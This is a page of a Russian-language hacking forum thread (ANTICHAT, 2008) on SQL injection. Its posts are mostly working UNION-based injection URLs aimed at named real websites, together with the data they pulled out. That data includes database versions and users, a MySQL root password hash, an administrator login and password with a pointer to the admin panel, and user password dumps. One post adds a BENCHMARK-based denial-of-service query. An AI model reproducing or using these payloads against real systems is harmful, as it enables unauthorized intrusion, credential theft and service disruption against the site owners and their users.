FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 474 из 1602

474

Опции темы

Поиск в этой теме

Опции просмотра

17.02.2008, 00:16

-=Static=-

Участник форума

Регистрация: 12.11.2006

Сообщений: 213

Провел на форуме:
347573

Репутация: 185

http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&ro llid=-3386'+union+select+1,2,3,USER(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,DATABASE()%20 from%20classifieds_advertisement%20where%20id='338 6'/*

VERSION(): 5.0.45-community-log
USER(): barefeet_office1@localhost
DATABASE(): barefeet_clss2

пример запроса для DoS:

http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&ro llid=-3386'+union+select+1,2,3,BENCHMARK(10000000,BENCHM ARK(10000000,md5(current_date))),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,title%20from %20classifieds_advertisement%20where%20id='3386'/*

17.02.2008, 02:28

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

Отправить сообщение для CaNNabi$ с помощью ICQ

Che-guevara/Эрнесто Че Гевара

Код:

http://www.che-guevara.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

4.1.22-standard/forexmol_cheguv@localhost/forexmol_cheguv

www.aqualang.ru

Код:

http://www.aqualang.ru/index.php?cat_id=1'%20union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/*

5.0.45-communitylog:mh3spea_vallwww@localhost:mh3spea_aqu alang

Код:

http://www.elblogdegloria.com/verblog.php?ID=0x3127%20union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/*

4.1.22-standard-log:gloria_admin@localhost:gloria_gloria

Просто так)

Код:

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.altsport.metroland.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.gynku.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.extremal.am/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

17.02.2008, 14:29

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Цитата:

Сообщение от -=Static=-

пример запроса для DoS:

А разве бенчмарк пашет на версиях выше третьей ?

17.02.2008, 03:16

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://www.dotfiles.com/index.php?cat_id=-6+union+select+concat_ws(0x3a,user,password)+from+ mysql.user/*

root:259010f859aea03d

Не бейте пожалуйста,люди,если уже было...просто очень хочу спать....

17.02.2008, 03:23

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://www.bis7.ru/- Сумки мать их...

http://www.bis7.ru/index.php?prid=-10+union+select+1,concat_ws(0x3a,name,passwd)+from +users/*

administrator:afina

P.S: А вот где админка хз ггггг)))

17.02.2008, 13:12

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от Велемир

administrator:afina

P.S: А вот где админка хз ггггг)))

/v_2/

17.02.2008, 03:41

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://www.williamsontea.com/Pressrelease/index.php?prid=-22+union+select+1,2,,4,5,6+from+customer/*

Ели еле подобрал таблицу, до полей руки не доходят...спать....хррр хррр...

17.02.2008, 13:22

Fuckel

Участник форума

Регистрация: 17.01.2008

Сообщений: 170

Провел на форуме:
1608606

Репутация: 105

Отправить сообщение для Fuckel с помощью ICQ

ссылка на прайс-лист: http://www.bis7.ru/v_2/database/file.php?table=price&field=price_file&id=1
можно отредкатировать запрос так что бы выдовал логин и пасс в названии файла скачивания.
доступна дериктория: http://www.bis7.ru/v_2/database/

Последний раз редактировалось Fuckel; 17.02.2008 в 13:26..

17.02.2008, 16:05

~~ThreeD~~

Banned

Регистрация: 25.12.2006

Сообщений: 179

Провел на форуме:
2337678

Репутация: 354

Прошу прощения,провтыкал.

Последний раз редактировалось ThreeD; 17.02.2008 в 16:25..

#10

17.02.2008, 16:20

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от ThreeD

5.0.37-log

http://www.big6.com/showarticle.php?id=-16+union+select+concat_ws(0x3A3a,username,user_pas sword,user_id,user_email),2,3,4,5+from+big6_users+ limit+0,1/*

было

Цитата:

http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,@@versio n,5,6,7,8,9--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,user_log in,5,6,7,8,9+from+tbluser--
http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,user_pas sword,5,6,7,8,9+from+tbluser--